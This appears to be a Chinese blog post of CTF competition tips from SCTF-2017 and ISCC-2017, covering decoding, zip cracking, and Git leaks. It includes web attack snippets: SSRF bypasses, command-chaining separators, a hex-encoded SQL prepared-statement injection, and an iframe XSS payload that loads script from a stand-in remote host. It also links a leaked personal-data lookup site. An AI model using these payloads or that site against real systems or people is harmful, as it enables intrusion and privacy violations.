Cyrus Flag

flag{S0_bangbang_7ha7_u_f1nd_h3r3}

CTF脑洞总结(置顶+不定期更新)

SCTF-2017

  • 签到MISC题什么的不会是什么高深的密码学,常规解码+栅栏+凯撒,比如这种:
    Z2dRQGdRMWZxaDBvaHRqcHRfc3d7Z2ZoZ3MjfQ==
     
  • Git题什么的可以直接用四叶草的GitHack(尤其是在做四叶草比赛的时候) 
    git clone https://github.com/BugScanTeam/GitHack
    git log -u 查看历史提交记录
    报错 refname '8894bb4d45643d52b5eb8175710999fcd398ebd4' is ambiguous. 可以考虑使用 git config advice.objectNameWarning false关闭报错。
     
  • U2Fsd开头可能是AES加盐。一般会提示密码。
    不提示就猜啊!
     
  • 各种隐写都考虑一下 OurSecret 这个工具吧。一般会提示密码。
    不提示就猜啊!
     
  • 压缩包密码小技巧:
    Step1 = 先跑一遍纯数字暴力。
    Step2 = 伪协议,0x504B 开始9-10位,改为 0x0000 解压一次。或者直接用工具 ZipCenOp.jar 解压。
    Step2 = 如果得到部分文件,剩下的文件可以选择已知明文攻击,将已知文件打包为另一个zip,用 Advanced Archive Password Recovery 即可。
    再不行就猜啊!
     
  • binwalk跑之前文件中有falg_balabala之类的可疑字样和一个有密码的压缩包,不如先试下密码。
     
  • SSRF题,file协议和ftp协议大小写是无所谓的,FiLe和Ftp什么的也许是绕过的好方法。
    顺便看下能不能扫到别的题目。。。
     
  • Git题一脸懵逼的时候不妨去找一下私钥然后直接 git pull
     

ISCC-2017 

  • 密码位方形+圆点=猪圈密码。又名共济会密码!别错过了什么提示词。
     
  • 嗯,压缩包还是先暴力一波纯数字的。
     
  • 嗯,键盘四个字母围起来,也算是密码。3-4位一组算提示吧。
     
  • cap握手包破解:aircrack工具
     
  • 某个文件上传:PHP5 or PHT文件
     
  • 某个弱类型: iscc={"bar1":"2017a","bar2":[[1],1,2,3,0]}&cat[0]=00isccctf2017&cat[1][]=1111&dog=%00}
     
  • 音频前面某些部位有方波,之后莫尔斯码。
     
  • MySQL会忽略字符集外的字符,用于绕过$_string! !== "admin",post数据结尾加入字符集外的字符。
     
  • shell执行命令方式:command和$(command)
    shell连接命令方式:;、|、&、%0a
  • 1
    <iframe srcdoc="%80<script>window.parent.document.body.appendChild(window.parent.document.createElement('script')).src='http://x.x.x.x/1.js'</script>">

  • 注入时如果GET过滤严格考虑一下POST
     
  • IP地址的其他写法:ref:http://www.freebuf.com/articles/web/135342.html
     
  • 社工库:http://s.70sec.com/
     
  • MySQL预查询:

    1
    SET @SQL=0x494E5345525420494E544F206D6F76696520286E616D652C20636F6E74656E74292056414C55455320282761616161272C27616161612729;PREPARE pord FROM @SQL;EXECUTE pord;
    其中0x494E5345525420494E544F206D6F76696520286E616D652C20636F6E74656E7429205 6414C55455320282761616161272C27616161612729可以解码为INSERT INTO movie (name, content) VALUES ('aaaa','aaaa')
    
    1
    (未完也别待续了)